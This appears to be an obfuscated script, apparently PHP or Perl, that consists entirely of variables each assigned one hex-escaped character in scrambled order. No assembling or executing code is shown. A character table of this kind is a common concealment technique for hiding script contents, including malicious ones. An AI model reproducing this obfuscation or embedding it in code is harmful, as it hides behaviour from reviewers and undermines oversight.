$ri331="\x6e";
$ri239="\x6e";$ri804="\x6c";$ri1471="\x75";$ri2="\x6d";
$ri302="\x20";
$ri1452="\x67";
$ri720="\x5d";$ri775="\x61";$ri1223="\x3b";$ri244="\x69";$ri683="\x5c";$ri1652="\x69";$ri237="\x67";
$ri681="\x64";$ri1012="\x0a";
$ri915="\x2e";$ri1655="\x22";$ri930="\x65";
$ri344="\x2b";$ri255="\x75";$ri815="\x6c";$ri1018="\x6f";$ri1059="\x61";$ri1193="\x64";$ri593="\x69";
$ri151="\x0a";$ri1514="\x20";$ri634="\x3c";$ri875="\x63";$ri1349="\x3d";
$ri793="\x3b";$ri1049="\x6f";$ri1340="\x20";$ri381="\x20";$ri1548="\x2d";$ri1344="\x72";$ri1143="\x40";$ri1120="\x66";$ri152="\x7b";$ri1413="\x22";$ri254="\x62";$ri985="\x65";
$ri289="\x69";
$ri487="\x63";$ri436="\x61";
$ri1531="\x6f";$ri273="\x68";
$ri1198="\x2b";
$ri1483="\x20";$ri1656="\x29";$ri652="\x20";
$ri577="\x5f";$ri1006="\x69";$ri829="\x63";
$ri997="\x61";$ri320="\x20";$ri1418="\x74";$ri464="\x73";$ri438="\x72";$ri1137="\x61";
$ri889="\x0a";$ri1429="\x39";$ri108="\x72";$ri1621="\x2c";$ri1290="\x7d";
$ri1696="\x65";$ri836="\x20";$ri118="\x61";$ri1245="\x31";
$ri763="\x28";$ri1636="\x61";$ri79="\x61";$ri863="\x20";$ri1086="\x20";
$ri49="\x65";
$ri812="\x65";$ri1355="\x09";$ri904="\x24";$ri453="\x20";$ri1325="\x72";$ri538="\x65";
$ri1132="\x61";$ri265="\x72";$ri855="\x6f";
$ri219="\x09";$ri1490="\x79";
$ri1564="\x6e";$ri1100="\x75";
$ri1096="\x0a";$ri1597="\x28";$ri225="\x28";
$ri5="\x65";$ri43="\x32";$ri1127="\x6d";$ri413="\x0a";$ri456="\x20";$ri1580="\x29";$ri835="\x3d";$ri956="\x61";$ri1425="\x32";
$ri298="\x20";$ri1346="\x6e";$ri1506="\x6f";$ri1611="\x6e";$ri21="\x65";
$ri527="\x61";$ri808="\x61";$ri908="\x72";$ri139="\x75";$ri28="\x69";$ri149="\x70";$ri1197="\x20";$ri198="\x20";$ri350="\x7b";$ri1299="\x61";$ri405="\x2c";$ri1092="\x65";$ri655="\x09";$ri1510="\x74";
$ri1686="\x63";$ri512="\x6c";$ri269="\x6f";$ri994="\x2e";$ri1121="\x6c";
$ri50="\x62";$ri1295="\x75";$ri1066="\x61";$ri567="\x3d";
$ri839="\x24";$ri196="\x20";
$ri1310="\x7b";$ri1335="\x3b";$ri1388="\x0a";$ri857="\x20";$ri1320="\x20";$ri1579="\x3a";$ri1103="\x66";$ri1179="\x79";$ri834="\x2e";$ri475="\x20";
$ri1629="\x6f";$ri1070="\x61";$ri607="\x6f";$ri880="\x3b";
$ri1130="\x28";$ri1551="\x7a";$ri476="\x74";$ri1233="\x69";$ri276="\x63";$ri317="\x69";$ri709="\x24";$ri1278="\x24";$ri1112="\x74";$ri622="\x28";$ri19="\x6f";$ri352="\x09";$ri922="\x0a";$ri1394="\x72";$ri1001="\x61";$ri1604="\x70";
$ri590="\x73";$ri601="\x6d";$ri1051="\x65";$ri1630="\x72";$ri946="\x69";$ri376="\x63";$ri354="\x70";$ri947="\x20";$ri253="\x20";$ri819="\x73";$ri1663="\x74";
$ri653="\x7b";
$ri1332="\x29";$ri735="\x24";$ri1093="\x3b";$ri963="\x2b";$ri325="\x69";$ri500="\x6f";$ri584="\x20";
$ri909="\x5f";$ri830="\x6f";$ri525="\x5f";
$ri1489="\x20";$ri1433="\x3b";$ri1637="\x72";$ri970="\x3d";$ri1240="\x3d";$ri944="\x28";$ri714="\x78";$ri8="\x65";$ri848="\x65";$ri138="\x73";$ri1058="\x76";$ri971="\x20";$ri864="\x30";
$ri1386="\x20";$ri759="\x69";$ri557="\x65";$ri170="\x74";$ri1273="\x40";$ri330="\x65";$ri349="\x20";$ri1105="\x73";$ri1450="\x69";
$ri271="\x20";$ri506="\x20";
$ri579="\x61";$ri424="\x6d";$ri1395="\x69";$ri833="\x20";$ri641="\x72";$ri1606="\x69";
$ri315="\x28";$ri1653="\x6f";
$ri1169="\x24";$ri838="\x5c";
$ri172="\x0a";$ri313="\x72";$ri1508="\x70";$ri1342="\x73";$ri110="\x73";$ri1175="\x0a";
$ri1689="\x0a";$ri871="\x20";$ri553="\x6e";$ri1501="\x6e";$ri533="\x68";$ri636="\x20";$ri1545="\x6f";$ri14="\x65";$ri1576="\x61";$ri460="\x20";$ri462="\x65";$ri145="\x61";
$ri25="\x72";$ri1227="\x40";$ri753="\x20";$ri193="\x69";
$ri1005="\x24";$ri323="\x20";
$ri60="\x61";$ri213="\x20";$ri1362="\x79";$ri933="\x3d";$ri1266="\x20";$ri189="\x40";$ri1024="\x20";$ri968="\x20";$ri1147="\x09";$ri1146="\x0a";$ri433="\x70";$ri88="\x65";
$ri1067="\x72";$ri1517="\x6e";$ri640="\x63";$ri1403="\x70";
$ri965="\x29";$ri677="\x24";$ri116="\x2c";$ri1472="\x72";
$ri764="\x24";$ri42="\x20";$ri337="\x63";$ri1480="\x64";$ri46="\x39";$ri939="\x20";
$ri1205="\x09";$ri770="\x69";$ri363="\x69";$ri672="\x74";$ri644="\x74";$ri1160="\x20";
$ri1246="\x5b";$ri1156="\x24";$ri731="\x69";$ri948="\x25";
$ri1614="\x0a";$ri1600="\x63";$ri1239="\x20";$ri484="\x77";
$ri1279="\x6a";$ri1684="\x22";$ri17="\x20";$ri486="\x20";$ri67="\x20";$ri1085="\x6e";$ri1396="\x6e";$ri229="\x65";
$ri734="\x5b";
$ri1424="\x28";$ri1638="\x5f";$ri222="\x61";$ri790="\x20";$ri205="\x6e";$ri925="\x24";$ri1="\x20";$ri1126="\x09";$ri1337="\x09";$ri194="\x70";$ri340="\x65";
$ri136="\x2e";
$ri510="\x65";$ri621="\x20";$ri1670="\x3b";$ri1282="\x24";$ri732="\x70";$ri134="\x65";$ri1262="\x5b";$ri414="\x0a";$ri1020="\x65";$ri1479="\x6f";$ri100="\x20";
$ri1535="\x69";$ri923="\x09";$ri936="\x5c";
$ri73="\x20";$ri1439="\x72";$ri1541="\x68";$ri248="\x3b";$ri1284="\x5d";$ri926="\x6d";$ri1397="\x67";$ri1443="\x72";$ri1546="\x64";
$ri123="\x65";$ri1682="\x63";$ri1220="\x20";$ri632="\x69";
$ri282="\x74";$ri633="\x20";$ri1060="\x6c";$ri858="\x28";$ri995="\x24";$ri600="\x09";$ri359="\x40";$ri797="\x0a";
$ri902="\x22";$ri76="\x6e";
$ri467="\x66";$ri1056="\x22";
$ri29="\x6e";$ri31="\x20";$ri659="\x63";$ri741="\x0a";
$ri343="\x20";$ri1584="\x63";
$ri167="\x68";$ri1578="\x20";$ri40="\x43";$ri1157="\x69";$ri115="\x64";$ri1075="\x3b";$ri370="\x62";
$ri12="\x20";
$ri1017="\x63";$ri1097="\x0a";$ri1605="\x72";
$ri54="\x69";$ri280="\x61";$ri954="\x28";
$ri1504="\x20";$ri113="\x76";$ri1090="\x6f";$ri91="\x69";$ri1709="\x20";$ri1255="\x0a";
$ri1104="\x69";$ri1700="\x69";$ri81="\x69";$ri643="\x70";$ri1412="\x63";$ri1339="\x79";
$ri1144="\x5f";$ri87="\x76";$ri704="\x61";$ri860="\x69";$ri77="\x65";$ri1188="\x74";$ri1595="\x70";$ri1003="\x65";
$ri1435="\x09";$ri1183="\x20";$ri938="\x22";$ri1327="\x6e";$ri1023="\x3d";$ri921="\x3b";$ri1574="\x74";$ri1114="\x73";$ri435="\x20";$ri832="\x65";$ri397="\x40";$ri1499="\x63";$ri227="\x69";$ri401="\x65";$ri792="\x29";$ri175="\x79";
$ri319="\x3d";$ri646="\x20";$ri13="\x50";
$ri1123="\x0a";
$ri146="\x6d";$ri95="\x23";$ri1602="\x3b";$ri99="\x6c";
$ri158="\x24";
$ri168="\x69";$ri1695="\x6e";$ri1312="\x09";
$ri1366="\x20";$ri1230="\x31";
$ri1081="\x65";$ri1196="\x69";$ri663="\x20";$ri246="\x6e";$ri555="\x65";$ri507="\x63";$ri1333="\x2b";
$ri789="\x3d";$ri1151="\x20";$ri70="\x6e";$ri588="\x64";$ri1139="\x29";$ri365="\x74";$ri929="\x64";$ri61="\x68";$ri1334="\x32";$ri360="\x73";$ri437="\x72";$ri444="\x65";
$ri422="\x64";$ri368="\x73";$ri628="\x30";
$ri278="\x61";$ri415="\x0a";$ri894="\x63";$ri1359="\x20";$ri787="\x20";$ri1286="\x0a";$ri1455="\x7d";$ri1641="\x6d";
$ri1125="\x0a";$ri627="\x20";$ri562="\x0a";$ri935="\x22";$ri463="\x20";$ri1167="\x2d";$ri917="\x24";$ri1082="\x74";$ri294="\x75";
$ri1658="\x0a";$ri1391="\x24";$ri518="\x09";$ri300="\x68";$ri1328="\x64";$ri1214="\x20";$ri346="\x24";$ri68="\x63";$ri1076="\x0a";$ri755="\x5c";$ri1650="\x61";$ri558="\x73";$ri794="\x0a";
$ri1463="\x73";$ri896="\x64";$ri844="\x5f";
$ri882="\x2b";$ri1281="\x20";$ri1643="\x2d";
$ri1259="\x24";$ri1457="\x0a";$ri1329="\x28";
$ri1493="\x20";
$ri101="\x72";$ri1264="\x69";$ri1497="\x79";$ri1715="\x0a";$ri733="\x74";$ri132="\x72";$ri979="\x09";$ri1609="\x20";
$ri1336="\x0a";$ri1558="\x20";$ri1486="\x61";$ri477="\x68";$ri536="\x66";$ri98="\x6c";$ri454="\x6f";$ri390="\x09";
$ri841="\x76";$ri144="\x74";
$ri1136="\x24";$ri396="\x20";$ri762="\x28";$ri1311="\x0a";$ri140="\x62";$ri1054="\x3d";$ri846="\x61";
$ri1244="\x61";
$ri457="\x68";$ri75="\x65";$ri366="\x2c";$ri1194="\x28";$ri619="\x6f";$ri1420="\x72";
$ri482="\x6f";$ri260="\x61";$ri723="\x6f";$ri495="\x69";$ri407="\x24";$ri450="\x61";$ri1438="\x09";$ri459="\x77";
$ri1491="\x6f";$ri228="\x6d";$ri976="\x09";$ri1149="\x6f";
$ri674="\x28";$ri1376="\x20";$ri1316="\x24";$ri999="\x5f";
$ri1109="\x5f";$ri582="\x20";$ri185="\x09";$ri513="\x61";$ri1275="\x61";$ri1035="\x5f";$ri1563="\x69";$ri64="\x72";
$ri805="\x63";$ri1247="\x24";$ri1680="\x0a";$ri9="\x61";$ri781="\x29";$ri807="\x6c";$ri1573="\x6e";$ri155="\x6d";$ri307="\x70";$ri1527="\x6f";$ri950="\x28";$ri630="\x20";$ri160="\x6f";$ri861="\x20";$ri56="\x6e";$ri892="\x24";$ri1195="\x24";
$ri989="\x20";$ri1399="\x2e";$ri1209="\x78";$ri310="\x09";
$ri1089="\x63";$ri519="\x66";$ri1108="\x72";$ri1254="\x3b";$ri1348="\x20";$ri55="\x61";$ri1270="\x20";$ri1694="\x65";$ri398="\x69";$ri59="\x72";$ri517="\x0a";
$ri635="\x3d";
$ri26="\x70";$ri760="\x66";$ri803="\x61";$ri1314="\x79";
$ri740="\x3b";$ri235="\x2a";
$ri69="\x6f";
$ri240="\x65";$ri1664="\x20";
$ri121="\x20";$ri1589="\x65";$ri521="\x73";$ri1445="\x20";
$ri1217="\x20";$ri505="\x74";
$ri129="\x65";$ri1025="\x22";$ri1115="\x5f";$ri1657="\x3b";$ri268="\x20";$ri739="\x29";$ri642="\x69";$ri474="\x23";$ri1117="\x68";
$ri1263="\x24";$ri249="\x0a";$ri327="\x3c";$ri595="\x67";$ri561="\x0a";$ri137="\x0a";$ri1540="\x74";$ri878="\x70";$ri1446="\x24";$ri1032="\x76";$ri1599="\x24";$ri1466="\x73";
$ri1037="\x61";$ri750="\x20";$ri1565="\x67";
$ri543="\x63";$ri1083="\x75";$ri345="\x2b";$ri277="\x68";$ri648="\x2b";$ri1513="\x34";$ri1063="\x24";$ri209="\x65";
$ri443="\x6b";$ri1045="\x09";
$ri1228="\x24";$ri1285="\x3b";$ri238="\x65";$ri1129="\x20";$ri761="\x20";$ri117="\x20";$ri1441="\x74";$ri153="\x0a";$ri899="\x2e";$ri283="\x65";$ri1474="\x69";$ri1476="\x65";$ri36="\x6e";$ri589="\x5f";$ri693="\x22";$ri22="\x20";$ri591="\x74";$ri1118="\x75";$ri1177="\x09";$ri272="\x74";
$ri1593="\x6f";$ri384="\x2c";$ri292="\x20";$ri1242="\x40";$ri357="\x68";$ri1647="\x6e";$ri497="\x64";$ri1528="\x72";$ri1110="\x79";$ri270="\x66";$ri112="\x72";$ri1030="\x27";$ri241="\x72";$ri1009="\x3b";
$ri700="\x61";$ri1297="\x20";$ri528="\x74";
$ri592="\x72";$ri191="\x63";$ri1427="\x29";$ri721="\x2c";
$ri831="\x64";$ri1260="\x61";$ri1364="\x24";$ri702="\x5f";$ri1416="\x69";
$ri1660="\x72";$ri849="\x3d";$ri0="\x23";$ri470="\x65";$ri1665="\x4f";$ri33="\x6e";
$ri1481="\x65";$ri1065="\x76";$ri179="\x20";
$ri1302="\x5f";$ri1212="\x69";$ri1646="\x65";$ri1569="\x70";$ri597="\x29";$ri675="\x22";
$ri796="\x7d";$ri296="\x6c";$ri245="\x6f";
$ri1133="\x31";$ri1536="\x6e";$ri232="\x25";$ri1590="\x74";$ri972="\x30";$ri618="\x66";$ri1235="\x20";$ri560="\x3b";$ri1367="\x3d";
$ri72="\x74";$ri1134="\x2c";
$ri133="\x73";$ri1357="\x6f";$ri66="\x23";$ri111="\x65";$ri1465="\x69";$ri1543="\x20";$ri1180="\x20";$ri699="\x76";
$ri1544="\x63";$ri785="\x29";
$ri1257="\x09";$ri1697="\x72";$ri86="\x20";$ri1539="\x20";$ri695="\x22";$ri1236="\x24";$ri383="\x69";
$ri373="\x72";
$ri730="\x72";$ri1382="\x2b";
$ri1057="\x65";$ri466="\x75";$ri159="\x63";$ri862="\x3d";$ri823="\x6e";$ri712="\x64";$ri1547="\x65";
$ri1204="\x0a";$ri1616="\x70";$ri1678="\x4f";$ri412="\x7d";$ri498="\x20";$ri1138="\x32";$ri1046="\x24";$ri872="\x24";
$ri859="\x24";$ri606="\x63";$ri403="\x65";$ri395="\x68";$ri501="\x72";$ri1011="\x3b";$ri773="\x28";$ri409="\x3b";$ri585="\x72";$ri348="\x29";
$ri779="\x32";$ri1378="\x6c";
$ri932="\x2e";$ri931="\x20";$ri624="\x69";$ri234="\x24";$ri913="\x65";$ri1184="\x3d";$ri1199="\x20";$ri90="\x73";$ri845="\x6e";$ri1555="\x20";$ri251="\x09";
$ri511="\x20";$ri1162="\x24";$ri353="\x09";$ri1087="\x24";$ri1512="\x20";$ri74="\x67";$ri80="\x74";$ri945="\x24";$ri416="\x09";$ri243="\x74";$ri774="\x72";$ri1618="\x6e";$ri267="\x79";
$ri231="\x29";$ri924="\x09";$ri1410="\x22";$ri473="\x09";
$ri82="\x6f";$ri1426="\x30";$ri374="\x28";$ri559="\x29";
$ri1050="\x64";$ri446="\x70";$ri837="\x22";$ri1221="\x24";$ri1550="\x69";$ri200="\x29";$ri1276="\x32";$ri1243="\x24";$ri1171="\x3b";$ri1248="\x6a";
$ri900="\x3d";$ri334="\x68";$ri1635="\x76";
$ri287="\x77";$ri766="\x20";$ri190="\x73";$ri52="\x73";$ri548="\x2c";$ri1274="\x24";$ri131="\x65";$ri1189="\x28";$ri1511="\x65";$ri377="\x6f";$ri364="\x70";$ri1080="\x72";$ri1234="\x2c";$ri488="\x61";$ri888="\x7b";
$ri729="\x63";$ri1522="\x69";
$ri1571="\x6e";$ri1475="\x76";$ri96="\x20";$ri1623="\x3e";$ri1313="\x6d";$ri103="\x67";$ri404="\x73";$ri1488="\x73";$ri372="\x74";$ri1666="\x20";$ri1166="\x20";$ri827="\x24";$ri358="\x20";$ri738="\x29";$ri217="\x0a";$ri57="\x20";
$ri1141="\x3d";$ri1627="\x61";$ri1516="\x65";
$ri461="\x77";$ri1007="\x2e";$ri905="\x24";$ri322="\x3b";$ri221="\x72";$ri583="\x3d";
$ri1631="\x70";$ri262="\x20";$ri973="\x29";
$ri1371="\x20";$ri173="\x09";$ri756="\x6e";
$ri78="\x72";$ri722="\x20";$ri1008="\x22";
$ri1608="\x74";$ri828="\x6d";$ri1383="\x24";$ri1291="\x0a";$ri1360="\x28";$ri1387="\x7b";$ri163="\x20";$ri1122="\x65";$ri806="\x75";
$ri465="\x68";$ri1343="\x74";$ri1393="\x74";
$ri1613="\x3b";$ri494="\x75";$ri698="\x24";
$ri993="\x22";
$ri1685="\x6e";$ri65="\x0a";$ri1649="\x72";$ri537="\x6c";
$ri765="\x69";$ri328="\x20";$ri1036="\x6e";$ri540="\x5c";
$ri16="\x6c";$ri1617="\x65";$ri1581="\x0a";
$ri1308="\x67";$ri1437="\x0a";$ri661="\x64";$ri1409="\x28";
$ri986="\x20";$ri1398="\x20";$ri285="\x73";$ri983="\x6f";$ri884="\x24";$ri1460="\x74";$ri1150="\x72";$ri802="\x63";$ri1549="\x73";$ri664="\x2e";$ri35="\x69";$ri966="\x29";$ri485="\x65";$ri728="\x73";$ri887="\x20";$ri419="\x72";
$ri877="\x69";
$ri992="\x24";$ri1672="\x63";$ri576="\x72";$ri259="\x20";
$ri1165="\x3b";$ri472="\x0a";$ri195="\x74";$ri1633="\x2d";$ri868="\x69";$ri687="\x78";$ri1014="\x09";$ri1128="\x79";
$ri550="\x5c";$ri38="\x20";
$ri1411="\x25";$ri84="\x2d";$ri447="\x20";
$ri1560="\x72";$ri547="\x74";
$ri309="\x0a";$ri1027="\x24";$ri1370="\x3b";$ri258="\x64";
$ri1667="\x24";$ri44="\x30";$ri165="\x20";$ri122="\x6c";$ri1524="\x6e";$ri1106="\x68";$ri651="\x29";$ri391="\x09";$ri1484="\x6d";$ri725="\x64";$ri788="\x3d";$ri800="\x23";$ri214="\x28";$ri216="\x3b";$ri1048="\x63";$ri809="\x74";
$ri962="\x29";$ri261="\x6e";
$ri371="\x73";$ri176="\x20";
$ri599="\x0a";$ri1040="\x27";$ri71="\x73";$ri281="\x63";$ri1163="\x61";$ri1068="\x5f";
$ri314="\x20";$ri252="\x23";$ri691="\x78";$ri1405="\x69";$ri305="\x72";
$ri1029="\x3d";$ri1222="\x6a";$ri142="\x6d";$ri161="\x64";$ri306="\x69";$ri967="\x29";
$ri654="\x0a";$ri107="\x20";$ri1261="\x32";$ri1356="\x66";$ri742="\x09";$ri1495="\x6e";$ri1561="\x6f";
$ri572="\x09";$ri1267="\x24";
$ri458="\x6f";$ri1498="\x20";$ri650="\x69";
$ri188="\x20";$ri1537="\x63";$ri201="\x2c";$ri1384="\x69";
$ri341="\x29";$ri206="\x64";$ri1468="\x72";$ri961="\x30";$ri247="\x29";$ri570="\x3b";$ri1648="\x65";$ri1454="\x0a";
$ri1473="\x73";$ri105="\x74";$ri898="\x20";$ri410="\x0a";$ri782="\x2b";$ri1598="\x24";$ri39="\x28";$ri616="\x0a";$ri427="\x65";$ri780="\x30";$ri1016="\x6d";$ri1482="\x2c";
$ri853="\x09";$ri1309="\x0a";$ri1710="\x24";
$ri1620="\x4f";
$ri937="\x6e";$ri178="\x69";$ri30="\x67";$ri1566="\x20";$ri988="\x3d";
$ri769="\x28";$ri991="\x5c";$ri1704="\x0a";$ri680="\x25";
$ri1119="\x66";
$ri493="\x62";$ri162="\x65";$ri546="\x70";$ri208="\x78";
$ri489="\x6e";$ri382="\x24";$ri1415="\x20";$ri509="\x64";$ri611="\x3d";
$ri1591="\x61";$ri1530="\x73";$ri783="\x31";$ri177="\x24";$ri1062="\x5c";
$ri613="\x22";$ri1521="\x74";$ri867="\x24";
$ri1515="\x67";$ri1219="\x3d";
$ri332="\x67";$ri1373="\x69";
$ri847="\x6d";$ri768="\x20";$ri1164="\x31";$ri288="\x68";$ri1363="\x20";$ri1402="\x73";$ri1407="\x74";$ri94="\x0a";$ri535="\x66";$ri1601="\x29";$ri1185="\x20";$ri1456="\x0a";$ri824="\x67";
$ri952="\x6e";$ri982="\x63";$ri799="\x09";$ri656="\x09";
$ri895="\x6f";$ri610="\x20";
$ri392="\x70";$ri207="\x65";
$ri284="\x72";$ri156="\x79";
$ri166="\x73";$ri1529="\x20";
$ri303="\x73";$ri11="\x6c";$ri286="\x20";
$ri481="\x73";$ri703="\x6e";$ri85="\x31";
$ri1155="\x20";$ri20="\x64";$ri598="\x3b";$ri224="\x64";$ri1321="\x69";$ri716="\x73";
$ri312="\x6f";$ri1654="\x6e";
$ri1181="\x24";$ri1683="\x3d";$ri504="\x63";$ri544="\x72";
$ri1210="\x74";$ri1161="\x40";$ri980="\x24";
$ri1585="\x20";$ri897="\x65";$ri1351="\x22";$ri522="\x68";$ri355="\x75";$ri1010="\x22";$ri1702="\x6e";$ri998="\x72";$ri375="\x24";$ri32="\x65";$ri545="\x69";$ri37="\x65";$ri666="\x20";
$ri324="\x24";$ri645="\x3b";$ri143="\x65";$ri369="\x75";$ri977="\x7d";$ri1326="\x61";$ri791="\x30";$ri1034="\x72";$ri293="\x62";$ri951="\x69";$ri1404="\x72";
$ri1674="\x6f";$ri749="\x65";$ri386="\x31";$ri524="\x72";$ri744="\x24";$ri623="\x24";
$ri1706="\x76";
$ri1687="\x22";$ri594="\x6e";$ri757="\x22";$ri127="\x20";
$ri821="\x72";$ri181="\x20";$ri1271="\x3d";$ri1039="\x65";$ri171="\x3b";$ri1318="\x20";$ri795="\x09";$ri1496="\x6c";
$ri1502="\x0a";$ri743="\x09";
$ri141="\x20";$ri573="\x24";$ri746="\x63";$ri1202="\x29";$ri851="\x3b";
$ri418="\x20";
$ri233="\x24";
$ri532="\x73";$ri92="\x6f";$ri1477="\x20";$ri1401="\x20";$ri565="\x69";
$ri625="\x20";$ri1582="\x24";$ri210="\x73";
$ri1436="\x7d";$ri1102="\x20";$ri1449="\x72";$ri53="\x74";$ri679="\x73";$ri1241="\x20";$ri885="\x69";$ri186="\x6d";$ri1206="\x09";$ri1377="\x24";$ri1111="\x61";$ri1015="\x24";$ri406="\x20";$ri114="\x65";$ri1552="\x65";$ri448="\x74";$ri701="\x72";$ri1280="\x2c";$ri1603="\x0a";$ri89="\x72";$ri1135="\x20";
$ri1203="\x3b";
$ri1044="\x0a";
$ri104="\x68";
$ri399="\x6e";
$ri356="\x73";$ri719="\x69";
$ri1229="\x61";$ri1538="\x65";$ri1422="\x6e";$ri1625="\x65";$ri1026="\x5c";$ri747="\x6f";$ri615="\x3b";$ri388="\x3b";$ri10="\x72";$ri1417="\x6e";
$ri568="\x20";
$ri1353="\x3b";
$ri1712="\x63";$ri713="\x65";$ri1269="\x5d";$ri772="\x74";$ri1669="\x63";$ri1172="\x29";$ri1703="\x3b";$ri408="\x69";$ri187="\x79";$ri688="\x25";$ri471="\x64";$ri869="\x20";$ri367="\x20";$ri960="\x32";$ri707="\x2c";$ri45="\x30";$ri1419="\x28";$ri299="\x74";
$ri678="\x25";$ri981="\x6d";
$ri843="\x72";$ri554="\x64";$ri596="\x28";$ri865="\x3b";$ri508="\x6f";$ri1592="\x6d";$ri717="\x5b";$ri1375="\x3c";$ri1374="\x20";$ri1095="\x7d";$ri718="\x24";$ri1296="\x62";$ri514="\x74";$ri1042="\x22";$ri336="\x24";$ri1047="\x6d";
$ri1091="\x64";$ri1557="\x73";$ri964="\x31";$ri943="\x28";$ri758="\x20";$ri184="\x0a";
$ri1250="\x20";$ri817="\x29";$ri257="\x6c";$ri1186="\x69";$ri1182="\x6a";$ri1338="\x6d";
$ri941="\x66";
$ri940="\x69";$ri752="\x3d";$ri901="\x20";$ri135="\x64";$ri1485="\x65";$ri426="\x7a";$ri308="\x74";$ri1615="\x6f";$ri1369="\x30";$ri657="\x24";$ri668="\x70";$ri949="\x20";$ri1158="\x20";$ri429="\x73";$ri1224="\x0a";$ri439="\x61";$ri1554="\x23";$ri710="\x69";$ri1372="\x24";$ri109="\x65";$ri1379="\x3b";$ri385="\x20";$ri1038="\x6d";
$ri1256="\x09";$ri667="\x73";$ri955="\x72";
$ri1304="\x74";$ri1301="\x64";$ri587="\x6e";
$ri873="\x23";$ri541="\x40";$ri290="\x63";$ri715="\x65";$ri420="\x61";$ri1347="\x67";$ri669="\x72";$ri1101="\x62";$ri421="\x6e";
$ri1681="\x24";$ri1542="\x65";$ri1619="\x28";$ri256="\x69";$ri776="\x6e";
$ri440="\x79";$ri531="\x5f";$ri1624="\x6d";
$ri51="\x61";$ri1572="\x65";$ri556="\x78";$ri1021="\x20";$ri242="\x61";$ri958="\x64";$ri1414="\x2c";$ri1002="\x6d";$ri604="\x24";$ri1216="\x69";$ri1152="\x28";$ri620="\x72";$ri581="\x65";
$ri934="\x20";$ri326="\x20";$ri566="\x20";
$ri347="\x69";$ri1324="\x28";$ri520="\x69";$ri711="\x6e";$ri1072="\x65";$ri881="\x20";$ri1662="\x6e";$ri394="\x73";$ri1294="\x73";$ri1323="\x74";$ri1708="\x6c";$ri919="\x2e";$ri342="\x3b";$ri1676="\x65";$ri1692="\x24";$ri694="\x3b";$ri539="\x28";
$ri1500="\x61";$ri903="\x5c";$ri148="\x72";$ri778="\x28";$ri1322="\x6e";
$ri1170="\x69";$ri569="\x30";$ri250="\x0a";$ri18="\x63";$ri1305="\x72";$ri182="\x30";$ri496="\x6c";$ri876="\x72";$ri515="\x65";$ri602="\x79";$ri736="\x69";$ri1430="\x37";$ri1380="\x20";$ri169="\x66";$ri1714="\x0a";
$ri1319="\x3d";$ri1272="\x20";$ri911="\x61";$ri400="\x64";$ri130="\x76";
$ri1406="\x6e";$ri1074="\x22";$ri1173="\x20";$ri434="\x74";$ri1315="\x20";$ri603="\x20";$ri1381="\x2b";$ri1459="\x20";$ri1131="\x24";$ri1113="\x65";$ri1568="\x78";$ri1444="\x6e";$ri492="\x65";
$ri266="\x61";$ri1526="\x20";
$ri1705="\x65";$ri478="\x65";$ri1478="\x63";$ri1265="\x2c";$ri1464="\x20";$ri1642="\x65";$ri1567="\x65";$ri387="\x29";$ri126="\x73";$ri304="\x63";$ri1691="\x2b";$ri1077="\x09";$ri4="\x72";$ri676="\x5c";$ri928="\x6f";$ri1148="\x66";$ri1423="\x64";$ri670="\x69";$ri502="\x72";$ri1238="\x5d";
$ri662="\x65";$ri706="\x65";
$ri199="\x28";$ri1632="\x68";
$ri914="\x22";$ri1505="\x63";$ri529="\x65";$ri197="\x3d";$ri1249="\x2c";$ri128="\x72";$ri1487="\x6e";$ri978="\x0a";$ri1084="\x72";$ri883="\x2b";$ri957="\x6e";$ri1354="\x0a";$ri530="\x73";$ri264="\x72";$ri455="\x6e";$ri321="\x30";$ri1519="\x72";$ri48="\x53";$ri7="\x70";$ri157="\x20";
$ri236="\x24";$ri534="\x75";
$ri491="\x72";$ri1116="\x73";$ri1053="\x2e";$ri125="\x74";$ri727="\x24";$ri212="\x3d";
$ri639="\x73";$ri840="\x24";$ri1553="\x0a";$ri1153="\x6d";
$ri1673="\x6c";$ri1408="\x66";$ri1317="\x6c";$ri751="\x2e";$ri47="\x20";
$ri1159="\x3d";$ri1668="\x6e";$ri202="\x20";$ri1634="\x24";
$ri1225="\x09";$ri480="\x20";$ri1461="\x68";
$ri339="\x64";$ri1645="\x67";
$ri301="\x65";$ri1447="\x73";$ri1448="\x74";$ri1064="\x24";$ri1588="\x6d";$ri311="\x66";$ri1099="\x73";$ri813="\x76";$ri275="\x20";$ri686="\x5c";
$ri1675="\x73";$ri801="\x20";$ri1440="\x65";$ri1078="\x0a";$ri378="\x64";
$ri866="\x20";$ri1532="\x2c";$ri690="\x32";$ri1098="\x0a";
$ri1659="\x70";$ri1232="\x24";$ri1713="\x3b";$ri647="\x2b";$ri658="\x6d";$ri1622="\x22";$ri697="\x20";$ri1612="\x63";$ri984="\x64";$ri490="\x20";$ri660="\x6f";$ri608="\x64";$ri969="\x3d";$ri220="\x73";$ri874="\x73";
$ri204="\x69";
$ri295="\x69";$ri451="\x63";$ri784="\x29";
$ri329="\x6c";$ri629="\x3b";$ri990="\x22";$ri423="\x6f";$ri1577="\x6c";$ri850="\x22";$ri150="\x68";$ri1518="\x65";$ri1190="\x72";$ri58="\x4b";$ri102="\x69";$ri27="\x68";
$ri333="\x74";$ri1610="\x24";
$ri1390="\x09";$ri822="\x69";$ri119="\x6c";$ri745="\x6d";$ri1671="\x0a";$ri1071="\x6d";$ri297="\x64";$ri318="\x20";$ri1192="\x6e";$ri1215="\x24";$ri614="\x22";$ri124="\x66";$ri120="\x6c";$ri1201="\x29";$ri724="\x72";$ri24="\x6f";$ri83="\x6e";$ri1534="\x73";$ri767="\x25";$ri975="\x0a";$ri432="\x69";$ri638="\x23";$ri708="\x20";$ri1341="\x24";$ri974="\x3b";$ri1200="\x31";$ri1303="\x73";$ri449="\x72";$ri351="\x0a";$ri1432="\x29";
$ri605="\x6d";$ri1556="\x69";$ri563="\x09";$ri1000="\x6e";$ri1494="\x6f";
$ri523="\x65";$ri771="\x6e";$ri428="\x20";$ri1698="\x61";$ri549="\x20";$ri1583="\x6e";$ri1207="\x6e";$ri696="\x2c";
$ri452="\x6b";$ri1022="\x2e";
$ri6="\x2d";$ri637="\x24";$ri1330="\x33";$ri1434="\x0a";$ri726="\x28";$ri180="\x3d";$ri810="\x65";$ri1570="\x6f";$ri1690="\x2b";
$ri1509="\x75";$ri361="\x63";$ri1385="\x29";$ri1069="\x6e";
